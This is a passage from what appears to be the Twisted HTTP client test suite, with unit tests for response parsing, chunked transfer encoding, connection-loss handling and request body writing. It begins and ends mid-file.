protocol = HTTPClientParser(None, None)
self.assertEqual(
protocol.parseVersion('CANDY/7.2'),
('CANDY', 7, 2))
def test_parseBadVersion(self):
"""
L{HTTPClientParser.parseVersion} raises L{ValueError} when passed an
unparsable version.
"""
protocol = HTTPClientParser(None, None)
e = BadResponseVersion
f = protocol.parseVersion
def checkParsing(s):
exc = self.assertRaises(e, f, s)
self.assertEqual(exc.data, s)
checkParsing('foo')
checkParsing('foo/bar/baz')
checkParsing('foo/')
checkParsing('foo/..')
checkParsing('foo/a.b')
checkParsing('foo/-1.-1')
def test_responseStatusParsing(self):
"""
L{HTTPClientParser.statusReceived} parses the version, code, and phrase
from the status line and stores them on the response object.
"""
request = Request('GET', '/', _boringHeaders, None)
protocol = HTTPClientParser(request, None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
self.assertEqual(protocol.response.version, ('HTTP', 1, 1))
self.assertEqual(protocol.response.code, 200)
self.assertEqual(protocol.response.phrase, 'OK')
def test_badResponseStatus(self):
"""
L{HTTPClientParser.statusReceived} raises L{ParseError} if it is called
with a status line which cannot be parsed.
"""
protocol = HTTPClientParser(None, None)
def checkParsing(s):
exc = self.assertRaises(ParseError, protocol.statusReceived, s)
self.assertEqual(exc.data, s)
# If there are fewer than three whitespace-delimited parts to the
# status line, it is not valid and cannot be parsed.
checkParsing('foo')
checkParsing('HTTP/1.1 200')
# If the response code is not an integer, the status line is not valid
# and cannot be parsed.
checkParsing('HTTP/1.1 bar OK')
def _noBodyTest(self, request, response):
"""
Assert that L{HTTPClientParser} parses the given C{response} to
C{request}, resulting in a response with no body and no extra bytes and
leaving the transport in the producing state.
@param request: A L{Request} instance which might have caused a server
to return the given response.
@param response: A string giving the response to be parsed.
@return: A C{dict} of headers from the response.
"""
header = {}
finished = []
protocol = HTTPClientParser(request, finished.append)
protocol.headerReceived = header.__setitem__
body = []
protocol._bodyDataReceived = body.append
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived(response)
self.assertEqual(transport.producerState, 'producing')
self.assertEqual(protocol.state, DONE)
self.assertEqual(body, [])
self.assertEqual(finished, [''])
self.assertEqual(protocol.response.length, 0)
return header
def test_headResponse(self):
"""
If the response is to a HEAD request, no body is expected, the body
callback is not invoked, and the I{Content-Length} header is passed to
the header callback.
"""
request = Request('HEAD', '/', _boringHeaders, None)
status = (
'HTTP/1.1 200 OK\r\n'
'Content-Length: 10\r\n'
'\r\n')
header = self._noBodyTest(request, status)
self.assertEqual(header, {'Content-Length': '10'})
def test_noContentResponse(self):
"""
If the response code is I{NO CONTENT} (204), no body is expected and
the body callback is not invoked.
"""
request = Request('GET', '/', _boringHeaders, None)
status = (
'HTTP/1.1 204 NO CONTENT\r\n'
'\r\n')
self._noBodyTest(request, status)
def test_notModifiedResponse(self):
"""
If the response code is I{NOT MODIFIED} (304), no body is expected and
the body callback is not invoked.
"""
request = Request('GET', '/', _boringHeaders, None)
status = (
'HTTP/1.1 304 NOT MODIFIED\r\n'
'\r\n')
self._noBodyTest(request, status)
def test_responseHeaders(self):
"""
The response headers are added to the response object's C{headers}
L{Headers} instance.
"""
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
lambda rest: None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('X-Foo: bar\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
protocol.connHeaders,
Headers({}))
self.assertEqual(
protocol.response.headers,
Headers({'x-foo': ['bar']}))
self.assertIdentical(protocol.response.length, UNKNOWN_LENGTH)
def test_connectionHeaders(self):
"""
The connection control headers are added to the parser's C{connHeaders}
L{Headers} instance.
"""
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
lambda rest: None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 123\r\n')
protocol.dataReceived('Connection: close\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
protocol.response.headers,
Headers({}))
self.assertEqual(
protocol.connHeaders,
Headers({'content-length': ['123'],
'connection': ['close']}))
self.assertEqual(protocol.response.length, 123)
def test_headResponseContentLengthEntityHeader(self):
"""
If a HEAD request is made, the I{Content-Length} header in the response
is added to the response headers, not the connection control headers.
"""
protocol = HTTPClientParser(
Request('HEAD', '/', _boringHeaders, None),
lambda rest: None)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 123\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(
protocol.response.headers,
Headers({'content-length': ['123']}))
self.assertEqual(
protocol.connHeaders,
Headers({}))
self.assertEqual(protocol.response.length, 0)
def test_contentLength(self):
"""
If a response includes a body with a length given by the
I{Content-Length} header, the bytes which make up the body are passed
to the C{_bodyDataReceived} callback on the L{HTTPParser}.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('Content-Length: 10\r\n')
protocol.dataReceived('\r\n')
# Incidentally, the transport should be paused now. It is the response
# object's responsibility to resume this when it is ready for bytes.
self.assertEqual(transport.producerState, 'paused')
self.assertEqual(protocol.state, BODY)
protocol.dataReceived('x' * 6)
self.assertEqual(body, ['x' * 6])
self.assertEqual(protocol.state, BODY)
protocol.dataReceived('y' * 4)
self.assertEqual(body, ['x' * 6, 'y' * 4])
self.assertEqual(protocol.state, DONE)
self.assertEqual(finished, [''])
def test_zeroContentLength(self):
"""
If a response includes a I{Content-Length} header indicating zero bytes
in the response, L{Response.length} is set accordingly and no data is
delivered to L{Response._bodyDataReceived}.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('Content-Length: 0\r\n')
protocol.dataReceived('\r\n')
self.assertEqual(protocol.state, DONE)
self.assertEqual(body, [])
self.assertEqual(finished, [''])
self.assertEqual(protocol.response.length, 0)
def test_multipleContentLengthHeaders(self):
"""
If a response includes multiple I{Content-Length} headers,
L{HTTPClientParser.dataReceived} raises L{ValueError} to indicate that
the response is invalid and the transport is now unusable.
"""
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
None)
protocol.makeConnection(StringTransport())
self.assertRaises(
ValueError,
protocol.dataReceived,
'HTTP/1.1 200 OK\r\n'
'Content-Length: 1\r\n'
'Content-Length: 2\r\n'
'\r\n')
def test_extraBytesPassedBack(self):
"""
If extra bytes are received past the end of a response, they are passed
to the finish callback.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 0\r\n')
protocol.dataReceived('\r\nHere is another thing!')
self.assertEqual(protocol.state, DONE)
self.assertEqual(finished, ['Here is another thing!'])
def test_extraBytesPassedBackHEAD(self):
"""
If extra bytes are received past the end of the headers of a response
to a HEAD request, they are passed to the finish callback.
"""
finished = []
protocol = HTTPClientParser(
Request('HEAD', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
protocol.dataReceived('Content-Length: 12\r\n')
protocol.dataReceived('\r\nHere is another thing!')
self.assertEqual(protocol.state, DONE)
self.assertEqual(finished, ['Here is another thing!'])
def test_chunkedResponseBody(self):
"""
If the response headers indicate the response body is encoded with the
I{chunked} transfer encoding, the body is decoded according to that
transfer encoding before being passed to L{Response._bodyDataReceived}.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None),
finished.append)
protocol.makeConnection(StringTransport())
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('Transfer-Encoding: chunked\r\n')
protocol.dataReceived('\r\n')
# No data delivered yet
self.assertEqual(body, [])
# Cannot predict the length of a chunked encoded response body.
self.assertIdentical(protocol.response.length, UNKNOWN_LENGTH)
# Deliver some chunks and make sure the data arrives
protocol.dataReceived('3\r\na')
self.assertEqual(body, ['a'])
protocol.dataReceived('bc\r\n')
self.assertEqual(body, ['a', 'bc'])
# The response's _bodyDataFinished method should be called when the last
# chunk is received. Extra data should be passed to the finished
# callback.
protocol.dataReceived('0\r\n\r\nextra')
self.assertEqual(finished, ['extra'])
def test_unknownContentLength(self):
"""
If a response does not include a I{Transfer-Encoding} or a
I{Content-Length}, the end of response body is indicated by the
connection being closed.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None), finished.append)
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived('\r\n')
protocol.dataReceived('foo')
protocol.dataReceived('bar')
self.assertEqual(body, ['foo', 'bar'])
protocol.connectionLost(ConnectionDone("simulated end of connection"))
self.assertEqual(finished, [''])
def test_contentLengthAndTransferEncoding(self):
"""
According to RFC 2616, section 4.4, point 3, if I{Content-Length} and
I{Transfer-Encoding: chunked} are present, I{Content-Length} MUST be
ignored.
"""
finished = []
protocol = HTTPClientParser(
Request('GET', '/', _boringHeaders, None), finished.append)
transport = StringTransport()
protocol.makeConnection(transport)
protocol.dataReceived('HTTP/1.1 200 OK\r\n')
body = []
protocol.response._bodyDataReceived = body.append
protocol.dataReceived(
'Content-Length: 102\r\n'
'Transfer-Encoding: chunked\r\n'
'\r\n'
'3\r\n'
'abc\r\n'
'0\r\n'
'\r\n')
self.assertEqual(body, ['abc'])
self.assertEqual(finished, [''])
def test_connectionLostBeforeBody(self):
"""
If L{HTTPClientParser.connectionLost} is called before the headers are
finished, the C{_responseDeferred} is fired with the L{Failure} passed
to C{connectionLost}.
"""
transport = StringTransport()
protocol = HTTPClientParser(Request('GET', '/', _boringHeaders, None), None)
protocol.makeConnection(transport)
# Grab this here because connectionLost gets rid of the attribute
responseDeferred = protocol._responseDeferred
protocol.connectionLost(Failure(ArbitraryException()))
return assertResponseFailed(
self, responseDeferred, [ArbitraryException])
def test_connectionLostWithError(self):
"""
If one of the L{Response} methods called by
L{HTTPClientParser.connectionLost} raises an exception, the exception
is logged and not re-raised.
"""
transport = StringTransport()
protocol = HTTPClientParser(Request('GET', '/', _boringHeaders, None),
None)
protocol.makeConnection(transport)
response = []
protocol._responseDeferred.addCallback(response.append)
protocol.dataReceived(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 1\r\n'
'\r\n')
response = response[0]
# Arrange for an exception
def fakeBodyDataFinished(err=None):
raise ArbitraryException()
response._bodyDataFinished = fakeBodyDataFinished
protocol.connectionLost(None)
self.assertEqual(len(self.flushLoggedErrors(ArbitraryException)), 1)
class SlowRequest:
"""
L{SlowRequest} is a fake implementation of L{Request} which is easily
controlled externally (for example, by code in a test method).
@ivar stopped: A flag indicating whether C{stopWriting} has been called.
@ivar finished: After C{writeTo} is called, a L{Deferred} which was
returned by that method. L{SlowRequest} will never fire this
L{Deferred}.
"""
method = 'GET'
stopped = False
def writeTo(self, transport):
self.finished = Deferred()
return self.finished
def stopWriting(self):
self.stopped = True
class SimpleRequest:
"""
L{SimpleRequest} is a fake implementation of L{Request} which writes a
short, fixed string to the transport passed to its C{writeTo} method and
returns a succeeded L{Deferred}. This vaguely emulates the behavior of a
L{Request} with no body producer.
"""
def writeTo(self, transport):
transport.write('SOME BYTES')
return succeed(None)
class HTTP11ClientProtocolTests(TestCase):
"""
Tests for the HTTP 1.1 client protocol implementation,
L{HTTP11ClientProtocol}.
"""
def setUp(self):
"""
Create an L{HTTP11ClientProtocol} connected to a fake transport.
"""
self.transport = StringTransport()
self.protocol = HTTP11ClientProtocol()
self.protocol.makeConnection(self.transport)
def test_request(self):
"""
L{HTTP11ClientProtocol.request} accepts a L{Request} and calls its
C{writeTo} method with its own transport.
"""
self.protocol.request(SimpleRequest())
self.assertEqual(self.transport.value(), 'SOME BYTES')
def test_secondRequest(self):
"""
The second time L{HTTP11ClientProtocol.request} is called, it returns a
L{Deferred} which immediately fires with a L{Failure} wrapping a
L{RequestNotSent} exception.
"""
self.protocol.request(SlowRequest())
def cbNotSent(ignored):
self.assertEqual(self.transport.value(), '')
d = self.assertFailure(
self.protocol.request(SimpleRequest()), RequestNotSent)
d.addCallback(cbNotSent)
return d
def test_requestAfterConnectionLost(self):
"""
L{HTTP11ClientProtocol.request} returns a L{Deferred} which immediately
fires with a L{Failure} wrapping a L{RequestNotSent} if called after
the protocol has been disconnected.
"""
self.protocol.connectionLost(
Failure(ConnectionDone("sad transport")))
def cbNotSent(ignored):
self.assertEqual(self.transport.value(), '')
d = self.assertFailure(
self.protocol.request(SimpleRequest()), RequestNotSent)
d.addCallback(cbNotSent)
return d
def test_failedWriteTo(self):
"""
If the L{Deferred} returned by L{Request.writeTo} fires with a
L{Failure}, L{HTTP11ClientProtocol.request} disconnects its transport
and returns a L{Deferred} which fires with a L{Failure} of
L{RequestGenerationFailed} wrapping the underlying failure.
"""
class BrokenRequest:
def writeTo(self, transport):
return fail(ArbitraryException())
d = self.protocol.request(BrokenRequest())
def cbFailed(ignored):
self.assertTrue(self.transport.disconnecting)
# Simulate what would happen if the protocol had a real transport
# and make sure no exception is raised.
self.protocol.connectionLost(
Failure(ConnectionDone("you asked for it")))
d = assertRequestGenerationFailed(self, d, [ArbitraryException])
d.addCallback(cbFailed)
return d
def test_synchronousWriteToError(self):
"""
If L{Request.writeTo} raises an exception,
L{HTTP11ClientProtocol.request} returns a L{Deferred} which fires with
a L{Failure} of L{RequestGenerationFailed} wrapping that exception.
"""
class BrokenRequest:
def writeTo(self, transport):
raise ArbitraryException()
d = self.protocol.request(BrokenRequest())
return assertRequestGenerationFailed(self, d, [ArbitraryException])
def test_connectionLostDuringRequestGeneration(self, mode=None):
"""
If L{HTTP11ClientProtocol}'s transport is disconnected before the
L{Deferred} returned by L{Request.writeTo} fires, the L{Deferred}
returned by L{HTTP11ClientProtocol.request} fires with a L{Failure} of
L{RequestTransmissionFailed} wrapping the underlying failure.
"""
request = SlowRequest()
d = self.protocol.request(request)
d = assertRequestTransmissionFailed(self, d, [ArbitraryException])
# The connection hasn't been lost yet. The request should still be
# allowed to do its thing.
self.assertFalse(request.stopped)
self.protocol.connectionLost(Failure(ArbitraryException()))
# Now the connection has been lost. The request should have been told
# to stop writing itself.
self.assertTrue(request.stopped)
if mode == 'callback':
request.finished.callback(None)
elif mode == 'errback':
request.finished.errback(Failure(AnotherArbitraryException()))
errors = self.flushLoggedErrors(AnotherArbitraryException)
self.assertEqual(len(errors), 1)
else:
# Don't fire the writeTo Deferred at all.
pass
return d
def test_connectionLostBeforeGenerationFinished(self):
"""
If the request passed to L{HTTP11ClientProtocol} finishes generation
successfully after the L{HTTP11ClientProtocol}'s connection has been
lost, nothing happens.
"""
return self.test_connectionLostDuringRequestGeneration('callback')
def test_connectionLostBeforeGenerationFailed(self):
"""
If the request passed to L{HTTP11ClientProtocol} finished generation
with an error after the L{HTTP11ClientProtocol}'s connection has been
lost, nothing happens.
"""
return self.test_connectionLostDuringRequestGeneration('errback')
def test_errorMessageOnConnectionLostBeforeGenerationFailedDoesNotConfuse(self):
"""
If the request passed to L{HTTP11ClientProtocol} finished generation
with an error after the L{HTTP11ClientProtocol}'s connection has been
lost, an error is logged that gives the user a non-confusing hint about what
went wrong.
"""
errors = []
log.addObserver(errors.append)
self.addCleanup(log.removeObserver, errors.append)
def check(ignore):
error = errors[0]
self.assertEquals(error['why'],
'Error writing request, but not in valid state '
'to finalize request: CONNECTION_LOST')
return self.test_connectionLostDuringRequestGeneration(
'errback').addCallback(check)
def test_receiveSimplestResponse(self):
"""
When a response is delivered to L{HTTP11ClientProtocol}, the
L{Deferred} previously returned by the C{request} method is called back
with a L{Response} instance and the connection is closed.
"""
d = self.protocol.request(Request('GET', '/', _boringHeaders, None))
def cbRequest(response):
self.assertEqual(response.code, 200)
self.assertEqual(response.headers, Headers())
self.assertTrue(self.transport.disconnecting)
d.addCallback(cbRequest)
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Content-Length: 0\r\n"
"\r\n")
return d
def test_receiveResponseHeaders(self):
"""
The headers included in a response delivered to L{HTTP11ClientProtocol}
are included on the L{Response} instance passed to the callback
returned by the C{request} method.
"""
d = self.protocol.request(Request('GET', '/', _boringHeaders, None))
def cbRequest(response):
expected = Headers({'x-foo': ['bar', 'baz']})
self.assertEqual(response.headers, expected)
d.addCallback(cbRequest)
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"X-Foo: bar\r\n"
"X-Foo: baz\r\n"
"\r\n")
return d
def test_receiveResponseBeforeRequestGenerationDone(self):
"""
If response bytes are delivered to L{HTTP11ClientProtocol} before the
L{Deferred} returned by L{Request.writeTo} fires, those response bytes
are parsed as part of the response.
"""
request = SlowRequest()
d = self.protocol.request(request)
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"X-Foo: bar\r\n"
"Content-Length: 6\r\n"
"\r\n"
"foobar")
def cbResponse(response):
p = AccumulatingProtocol()
whenFinished = p.closedDeferred = Deferred()
response.deliverBody(p)
return whenFinished.addCallback(
lambda ign: (response, p.data))
d.addCallback(cbResponse)
def cbAllResponse((response, body)):
self.assertEqual(response.version, ('HTTP', 1, 1))
self.assertEqual(response.code, 200)
self.assertEqual(response.phrase, 'OK')
self.assertEqual(response.headers, Headers({'x-foo': ['bar']}))
self.assertEqual(body, "foobar")
# Also nothing bad should happen if the request does finally
# finish, even though it is completely irrelevant.
request.finished.callback(None)
d.addCallback(cbAllResponse)
return d
def test_receiveResponseBody(self):
"""
The C{deliverBody} method of the response object with which the
L{Deferred} returned by L{HTTP11ClientProtocol.request} fires can be
used to get the body of the response.
"""
protocol = AccumulatingProtocol()
whenFinished = protocol.closedDeferred = Deferred()
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Content-Length: 6\r\n"
"\r")
# Here's what's going on: all the response headers have been delivered
# by this point, so the request Deferred can fire with a Response
# object. The body is yet to come, but that's okay, because the
# Response object is how you *get* the body.
result = []
requestDeferred.addCallback(result.append)
self.assertEqual(result, [])
# Deliver the very last byte of the response. It is exactly at this
# point which the Deferred returned by request should fire.
self.protocol.dataReceived("\n")
response = result[0]
response.deliverBody(protocol)
self.protocol.dataReceived("foo")
self.protocol.dataReceived("bar")
def cbAllResponse(ignored):
self.assertEqual(protocol.data, "foobar")
protocol.closedReason.trap(ResponseDone)
whenFinished.addCallback(cbAllResponse)
return whenFinished
def test_responseBodyFinishedWhenConnectionLostWhenContentLengthIsUnknown(
self):
"""
If the length of the response body is unknown, the protocol passed to
the response's C{deliverBody} method has its C{connectionLost}
method called with a L{Failure} wrapping a L{PotentialDataLoss}
exception.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"\r\n")
result = []
requestDeferred.addCallback(result.append)
response = result[0]
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
self.protocol.dataReceived("foo")
self.protocol.dataReceived("bar")
self.assertEqual(protocol.data, "foobar")
self.protocol.connectionLost(
Failure(ConnectionDone("low-level transport disconnected")))
protocol.closedReason.trap(PotentialDataLoss)
def test_chunkedResponseBodyUnfinishedWhenConnectionLost(self):
"""
If the final chunk has not been received when the connection is lost
(for any reason), the protocol passed to C{deliverBody} has its
C{connectionLost} method called with a L{Failure} wrapping the
exception for that reason.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Transfer-Encoding: chunked\r\n"
"\r\n")
result = []
requestDeferred.addCallback(result.append)
response = result[0]
protocol = AccumulatingProtocol()
response.deliverBody(protocol)
self.protocol.dataReceived("3\r\nfoo\r\n")
self.protocol.dataReceived("3\r\nbar\r\n")
self.assertEqual(protocol.data, "foobar")
self.protocol.connectionLost(Failure(ArbitraryException()))
return assertResponseFailed(
self, fail(protocol.closedReason), [ArbitraryException, _DataLoss])
def test_parserDataReceivedException(self):
"""
        If the parser to which L{HTTP11ClientProtocol} delivers bytes raises
        an exception in C{dataReceived}, the exception is wrapped in a
        L{Failure} and passed to the parser's C{connectionLost}, and then the
        L{HTTP11ClientProtocol}'s transport is disconnected.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
self.protocol.dataReceived('unparseable garbage goes here\r\n')
d = assertResponseFailed(self, requestDeferred, [ParseError])
def cbFailed(exc):
self.assertTrue(self.transport.disconnecting)
self.assertEqual(
exc.reasons[0].value.data, 'unparseable garbage goes here')
            # Now do what StringTransport doesn't do but a real transport would
            # have done: call connectionLost on the HTTP11ClientProtocol.  Nothing
# is asserted about this, but it's important for it to not raise an
# exception.
self.protocol.connectionLost(Failure(ConnectionDone("it is done")))
d.addCallback(cbFailed)
return d
def test_proxyStopped(self):
"""
When the HTTP response parser is disconnected, the
L{TransportProxyProducer} which was connected to it as a transport is
stopped.
"""
requestDeferred = self.protocol.request(Request('GET', '/', _boringHeaders, None))
transport = self.protocol._parser.transport
self.assertIdentical(transport._producer, self.transport)
self.protocol._disconnectParser(Failure(ConnectionDone("connection done")))
self.assertIdentical(transport._producer, None)
return assertResponseFailed(self, requestDeferred, [ConnectionDone])
def test_abortClosesConnection(self):
"""
The transport will be told to close its connection when
L{HTTP11ClientProtocol.abort} is invoked.
"""
transport = StringTransport()
protocol = HTTP11ClientProtocol()
protocol.makeConnection(transport)
protocol.abort()
self.assertTrue(transport.disconnecting)
def test_abortBeforeResponseBody(self):
"""
The Deferred returned by L{HTTP11ClientProtocol.request} will fire
with a L{ResponseFailed} failure containing a L{ConnectionAborted}
exception, if the connection was aborted before all response headers
have been received.
"""
transport = StringTransport()
protocol = HTTP11ClientProtocol()
protocol.makeConnection(transport)
result = protocol.request(Request('GET', '/', _boringHeaders, None))
protocol.abort()
self.assertTrue(transport.disconnecting)
protocol.connectionLost(Failure(ConnectionDone()))
return assertResponseFailed(self, result, [ConnectionAborted])
def test_abortAfterResponseHeaders(self):
"""
When the connection is aborted after the response headers have
been received and the L{Response} has been made available to
application code, the response body protocol's C{connectionLost}
method will be invoked with a L{ResponseFailed} failure containing a
L{ConnectionAborted} exception.
"""
transport = StringTransport()
protocol = HTTP11ClientProtocol()
protocol.makeConnection(transport)
result = protocol.request(Request('GET', '/', _boringHeaders, None))
protocol.dataReceived(
"HTTP/1.1 200 OK\r\n"
"Content-Length: 1\r\n"
"\r\n"
)
testResult = Deferred()
class BodyDestination(Protocol):
"""
A body response protocol which immediately aborts the HTTP
connection.
"""
def connectionMade(self):
"""
Abort the HTTP connection.
"""
protocol.abort()
def connectionLost(self, reason):
"""
                Make the reason the connection was lost available to the
                unit test via C{testResult}.
"""
testResult.errback(reason)
def deliverBody(response):
"""
Connect the L{BodyDestination} response body protocol to the
response, and then simulate connection loss after ensuring that
the HTTP connection has been aborted.
"""
response.deliverBody(BodyDestination())
self.assertTrue(transport.disconnecting)
protocol.connectionLost(Failure(ConnectionDone()))
result.addCallback(deliverBody)
return assertResponseFailed(self, testResult,
[ConnectionAborted, _DataLoss])
class StringProducer:
"""
L{StringProducer} is a dummy body producer.
@ivar stopped: A flag which indicates whether or not C{stopProducing} has
been called.
@ivar consumer: After C{startProducing} is called, the value of the
C{consumer} argument to that method.
@ivar finished: After C{startProducing} is called, a L{Deferred} which was
returned by that method. L{StringProducer} will never fire this
L{Deferred}.
"""
implements(IBodyProducer)
stopped = False
def __init__(self, length):
self.length = length
def startProducing(self, consumer):
self.consumer = consumer
self.finished = Deferred()
return self.finished
def stopProducing(self):
self.stopped = True
class RequestTests(TestCase):
"""
Tests for L{Request}.
"""
def setUp(self):
self.transport = StringTransport()
def test_sendSimplestRequest(self):
"""
L{Request.writeTo} formats the request data and writes it to the given
transport.
"""
Request('GET', '/', _boringHeaders, None).writeTo(self.transport)
self.assertEqual(
self.transport.value(),
"GET / HTTP/1.1\r\n"
"Connection: close\r\n"
"Host: example.com\r\n"
"\r\n")
def test_sendRequestHeaders(self):
"""
L{Request.writeTo} formats header data and writes it to the given
transport.
"""
headers = Headers({'x-foo': ['bar', 'baz'], 'host': ['example.com']})
Request('GET', '/foo', headers, None).writeTo(self.transport)
lines = self.transport.value().split('\r\n')
self.assertEqual(lines[0], "GET /foo HTTP/1.1")
self.assertEqual(lines[-2:], ["", ""])
del lines[0], lines[-2:]
lines.sort()
self.assertEqual(
lines,
["Connection: close",
"Host: example.com",
"X-Foo: bar",
"X-Foo: baz"])
def test_sendChunkedRequestBody(self):
"""
L{Request.writeTo} uses chunked encoding to write data from the request
body producer to the given transport. It registers the request body
producer with the transport.
"""
producer = StringProducer(UNKNOWN_LENGTH)
request = Request('POST', '/bar', _boringHeaders, producer)
request.writeTo(self.transport)
self.assertNotIdentical(producer.consumer, None)
self.assertIdentical(self.transport.producer, producer)
self.assertTrue(self.transport.streaming)
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Transfer-Encoding: chunked\r\n"
"Host: example.com\r\n"
"\r\n")
self.transport.clear()
producer.consumer.write('x' * 3)
producer.consumer.write('y' * 15)
producer.finished.callback(None)
self.assertIdentical(self.transport.producer, None)
self.assertEqual(
self.transport.value(),
"3\r\n"
"xxx\r\n"
"f\r\n"
"yyyyyyyyyyyyyyy\r\n"
"0\r\n"
"\r\n")
def test_sendChunkedRequestBodyWithError(self):
"""
If L{Request} is created with a C{bodyProducer} without a known length
and the L{Deferred} returned from its C{startProducing} method fires
with a L{Failure}, the L{Deferred} returned by L{Request.writeTo} fires
with that L{Failure} and the body producer is unregistered from the
transport. The final zero-length chunk is not written to the
transport.
"""
producer = StringProducer(UNKNOWN_LENGTH)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
self.transport.clear()
producer.finished.errback(ArbitraryException())
def cbFailed(ignored):
self.assertEqual(self.transport.value(), "")
self.assertIdentical(self.transport.producer, None)
d = self.assertFailure(writeDeferred, ArbitraryException)
d.addCallback(cbFailed)
return d
def test_sendRequestBodyWithLength(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length,
that length is sent as the value for the I{Content-Length} header and
chunked encoding is not used.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
request.writeTo(self.transport)
self.assertNotIdentical(producer.consumer, None)
self.assertIdentical(self.transport.producer, producer)
self.assertTrue(self.transport.streaming)
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Content-Length: 3\r\n"
"Host: example.com\r\n"
"\r\n")
self.transport.clear()
producer.consumer.write('abc')
producer.finished.callback(None)
self.assertIdentical(self.transport.producer, None)
self.assertEqual(self.transport.value(), "abc")
def test_sendRequestBodyWithTooFewBytes(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length and
the producer does not produce that many bytes, the L{Deferred} returned
by L{Request.writeTo} fires with a L{Failure} wrapping a
L{WrongBodyLength} exception.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.consumer.write('ab')
producer.finished.callback(None)
self.assertIdentical(self.transport.producer, None)
return self.assertFailure(writeDeferred, WrongBodyLength)
def _sendRequestBodyWithTooManyBytesTest(self, finisher):
"""
Verify that when too many bytes have been written by a body producer
and then the body producer's C{startProducing} L{Deferred} fires that
the producer is unregistered from the transport and that the
L{Deferred} returned from L{Request.writeTo} is fired with a L{Failure}
wrapping a L{WrongBodyLength}.
@param finisher: A callable which will be invoked with the body
producer after too many bytes have been written to the transport.
It should fire the startProducing Deferred somehow.
"""
producer = StringProducer(3)
request = Request('POST', '/bar', _boringHeaders, producer)
writeDeferred = request.writeTo(self.transport)
producer.consumer.write('ab')
# The producer hasn't misbehaved yet, so it shouldn't have been
# stopped.
self.assertFalse(producer.stopped)
producer.consumer.write('cd')
# Now the producer *has* misbehaved, so we should have tried to
# make it stop.
self.assertTrue(producer.stopped)
# The transport should have had the producer unregistered from it as
# well.
self.assertIdentical(self.transport.producer, None)
def cbFailed(exc):
# The "cd" should not have been written to the transport because
# the request can now locally be recognized to be invalid. If we
# had written the extra bytes, the server could have decided to
# start processing the request, which would be bad since we're
# going to indicate failure locally.
self.assertEqual(
self.transport.value(),
"POST /bar HTTP/1.1\r\n"
"Connection: close\r\n"
"Content-Length: 3\r\n"
"Host: example.com\r\n"
"\r\n"
"ab")
self.transport.clear()
# Subsequent writes should be ignored, as should firing the
# Deferred returned from startProducing.
self.assertRaises(ExcessWrite, producer.consumer.write, 'ef')
# Likewise, if the Deferred returned from startProducing fires,
# this should more or less be ignored (aside from possibly logging
# an error).
finisher(producer)
# There should have been nothing further written to the transport.
self.assertEqual(self.transport.value(), "")
d = self.assertFailure(writeDeferred, WrongBodyLength)
d.addCallback(cbFailed)
return d
def test_sendRequestBodyWithTooManyBytes(self):
"""
If L{Request} is created with a C{bodyProducer} with a known length and
        the producer tries to produce more than that many bytes, the
L{Deferred} returned by L{Request.writeTo} fires with a L{Failure}
wrapping a L{WrongBodyLength} exception.
"""
def finisher(producer):
producer.finished.callback(None)
return self._sendRequestBodyWithTooManyBytesTest(finisher)
def test_sendRequestBodyErrorWithTooManyBytes(self):
"""
